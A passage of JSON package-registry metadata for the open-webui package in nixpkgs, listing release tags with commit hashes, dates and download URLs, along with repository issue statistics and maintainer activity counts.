ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"9bcd4ce5c0a01af68c0d2aa44554a68bb741c61b","kind":"commit","published_at":"2024-07-09T21:25:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4900ac5136579c44c1be63f9b093fe8aff199910","kind":"commit","published_at":"2024-06-30T03:26:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"b0724811dfdb70883c112c20e05dda46707e0330","kind":"commit","published_at":"2024-06-27T20:38:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"9e4dd4b86f77653b59dc1fa97fe3f72e8252b359","kind":"commit","published_at":"2024-06-17T05:52:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"8f3c9b391be312c72c1a621135fd3cbe33fc0d15","kind":"commit","published_at":"2024-06-12T18:21:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"c41b33c9c0722c84055a833802611f8ee39609d3","kind":"commit","published_at":"2024-06-12T09:14:37.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"3933db2c91e635da52a28a9e7e2927f551b2fee6","kind":"commit","published_at":"2024-06-10T20:53:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"75d455ac8fc64f741607613c2277a02e28228a3c","kind":"commit","published_at":"2024-06-10T02:09:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"96a004d4d8289db1dea83a322f26ab01be3db3fc","kind":"commit","published_at":"2024-06-10T01:11:53.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.0/manifests"},{"name":"v0.2.5","sha":"dbb83f9824154480908e77fa4562d9fbe73a5de4","kind":"commit","published_at":"2024-06-05T17:06:11.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"f28877f4db2a136f26c495e033f1d2b4ea1b405c","kind":"commit","published_at":"2024-06-04T04:29:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"14646e84ea5e9d85fbb27a557ca14fb241cc373b","kind":"commit","published_at":"2024-06-03T20:06:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"5be97b81d61c571eb6758bf7b3d2ee85a09d2d02","kind":"commit","published_at":"2024-06-03T01:27:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"cfc78dedf0024ecb97a5090825af2698524c9d71","kind":"commit","published_at":"2024-06-02T21:08:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"72354e06a759075024d6be6bc6a8e717ec29d823","kind":"commit","published_at":"2024-06-02T05:03:02.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.2.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.2.0/manifests"},{"name":"v0.1.125","sha":"be5534c655f6cb3cc54c079de3f19d671e7a172b","kind":"commit","published_at":"2024-05-19T20:16:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.125","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.125","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.125","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.125","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.125/manifests"},{"name":"v0.1.124","sha":"b8d7fdf16e57deaf7faaa4dad7c2c5666e8b18ed","kind":"commit","published_at":"2024-05-08T17:54:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.124","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.124","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.124","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.124","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.124/manifests"},{"name":"v0.1.123","sha":"38ff3209ad2a57d8adb61cd597a7a5f55737ab25","kind":"commit","published_at":"2024-05-02T20:10:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.123","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.123","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.123","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.123","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.123/manifests"},{"name":"v0.1.122","sha":"92c98eda2e7340bc7c8f32d33bc49cec8498b1bb","kind":"commit","published_at":"2024-04-28T01:29:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.122","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.122","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.122","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.122","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.122/manifests"},{"name":"v0.1.121","sha":"748cb7d4460d38e73bb94260d2f78a98f56b7bf4","kind":"commit","published_at":"2024-04-24T19:31:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.121","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.121","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.121","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.121","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.121/manifests"},{"name":"v0.1.120","sha":"22c50f62cbbe9445bc8ea00695310ed740ad3789","kind":"commit","published_at":"2024-04-21T00:41:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.120","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.120","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.120","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.120","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.120/manifests"},{"name":"v0.1.119","sha":"851754700a4d4c90602c57564076521940d88fca","kind":"commit","published_at":"2024-04-16T22:12:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.119","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.119","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.119","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.119","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.119/manifests"},{"name":"v0.1.118","sha":"0399a69b73de9789c4221acedea70d528e1346c4","kind":"commit","published_at":"2024-04-10T22:41:12.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.118","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.118","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.118","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.118","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.118/manifests"},{"name":"v0.1.117","sha":"46774aa5cdbf4e894776978be60311210a6d0b32","kind":"commit","published_at":"2024-04-04T04:43:17.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.117","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.117","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.117","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.117","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.117/manifests"},{"name":"v0.1.116","sha":"3b0cb7945f5c9dbe55d5f76720ddf4e475c11169","kind":"commit","published_at":"2024-03-31T08:17:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.116","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.116","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.116","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.116","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.116/manifests"},{"name":"v0.1.115","sha":"ac294a74e7bc5f080970c049c656506e36f9407b","kind":"commit","published_at":"2024-03-24T23:20:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.115","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.115","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.115","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.115","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.115/manifests"},{"name":"v0.1.114","sha":"2fa94956f4e500bf5c42263124c758d8613ee05e","kind":"commit","published_at":"2024-03-21T02:34:22.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.114","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.114","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.114","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.114","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.114/manifests"},{"name":"v0.1.113","sha":"621719c6ac504e1c217fda3e445375a1d20802a3","kind":"commit","published_at":"2024-03-18T18:02:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.113","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.113","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.113","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.113","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.113/manifests"},{"name":"v0.1.112","sha":"5ce421e7faf79f8d7a28fd7cebe6fdc445c4146e","kind":"commit","published_at":"2024-03-15T20:49:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.112","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.112","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.112","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.112","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.112/manifests"},{"name":"v0.1.111","sha":"89634046e721c972eb24bd5115bd9eff77513d7a","kind":"commit","published_at":"2024-03-10T22:00:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.111","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.111","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.111","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.111","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.111/manifests"},{"name":"v0.1.110","sha":"8ed5759d0e9424f87d01fe3f8013116c4ba2004f","kind":"commit","published_at":"2024-03-07T04:32:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.110","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.110","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.110","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.110","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.110/manifests"},{"name":"v0.1.109","sha":"92e21acb4cfa8fb91c56df2903d7fc33448f7aae","kind":"commit","published_at":"2024-03-06T20:40:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.109","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.109","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.109","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.109","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.109/manifests"},{"name":"v0.1.108","sha":"eb51ad14e4caafda1c9fd24c4945044b8776a7a3","kind":"commit","published_at":"2024-03-03T03:25:17.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.108","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.108","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.108","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.108","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.108/manifests"},{"name":"v0.1.107","sha":"6c70d0f770ce4b0acf8d2a33eb7c0f27ffbed631","kind":"commit","published_at":"2024-03-02T07:05:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.107","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.107","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.107","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.107","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.107/manifests"},{"name":"v0.1.106","sha":"a181b2b63ba4f263e1683b087194e2f431960525","kind":"commit","published_at":"2024-02-28T04:11:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.106","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.106","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.106","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.106","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.106/manifests"},{"name":"v0.1.105","sha":"6df2505bf0352a7580b33f17ce6844afe04fb7be","kind":"commit","published_at":"2024-02-26T05:53:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.105","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.105","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.105","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.105","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.105/manifests"},{"name":"v0.1.104","sha":"3c10c3b928097035655e913eaf0e5dfc900f0f25","kind":"commit","published_at":"2024-02-25T21:05:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.104","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.104","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.104","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.104","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.104/manifests"},{"name":"v0.1.103","sha":"02fb517bbe0e40bf8a10df88d9c021f69ffe9ce3","kind":"commit","published_at":"2024-02-25T19:01:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.103","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.103","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.103","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.103","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.103/manifests"},{"name":"v0.1.102","sha":"4a47833f838088a0309edad2f85ff247b2ad6e00","kind":"commit","published_at":"2024-02-23T03:34:09.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.1.102","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.1.102","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.1.102","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.102","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.1.102/manifests"}]},"repo_metadata_updated_at":"2026-08-23T09:52:46.105Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{},"purl":"pkg:nix/open-webui?channel=24.05\u0026repository_url=https://channels.nixos.org/nixos-24.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/open-webui","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/open-webui","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/open-webui/dependencies","status":null,"funding_links":["https://github.com/sponsors/open-webui"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T22:02:18.537Z","issues_count":5534,"pull_requests_count":5052,"avg_time_to_close_issue":778857.2304849884,"avg_time_to_close_pull_request":412387.06346525095,"issues_closed_count":2165,"pull_requests_closed_count":4144,"pull_request_authors_count":1356,"issue_authors_count":3588,"avg_comments_per_issue":0.9989157932779184,"avg_comments_per_pull_request":1.1668646080760094,"merged_pull_requests_count":2388,"bot_issues_count":2,"bot_pull_requests_count":306,"past_year_issues_count":429,"past_year_pull_requests_count":524,"past_year_avg_time_to_close_issue":670686.1807909604,"past_year_avg_time_to_close_pull_request":1495749.093939394,"past_year_issues_closed_count":177,"past_year_pull_requests_closed_count":330,"past_year_pull_request_authors_count":189,"past_year_issue_authors_count":329,"past_year_avg_comments_per_issue":2.2750582750582753,"past_year_avg_comments_per_pull_request":1.284351145038168,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":26,"past_year_merged_pull_requests_count":91,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/issues","maintainers":[{"login":"silentoplayz","count":182,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/silentoplayz"},{"login":"Classic298","count":97,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Classic298"},{"login":"dannyl1u","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dannyl1u"},{"login":"Silentoplayz","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Silentoplayz"},{"login":"justinh-rahb","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinh-rahb"},{"login":"ayanahye","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ayanahye"},{"login":"jackthgu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jackthgu"},{"login":"andrewbbaek","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andrewbbaek"},{"login":"bdsumon4u","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bdsumon4u"},{"login":"matgla","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matgla"},{"login":"byg1004","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byg1004"},{"login":"GryBsh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GryBsh"},{"login":"pagoru","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pagoru"},{"login":"mohswell","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mohswell"},{"login":"MickWang","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MickWang"}],"active_maintainers":[{"login":"Classic298","count":97,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Classic298"},{"login":"silentoplayz","count":67,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/silentoplayz"},{"login":"andrewbbaek","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andrewbbaek"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/open-webui/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/open-webui/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/open-webui/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/open-webui/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/regist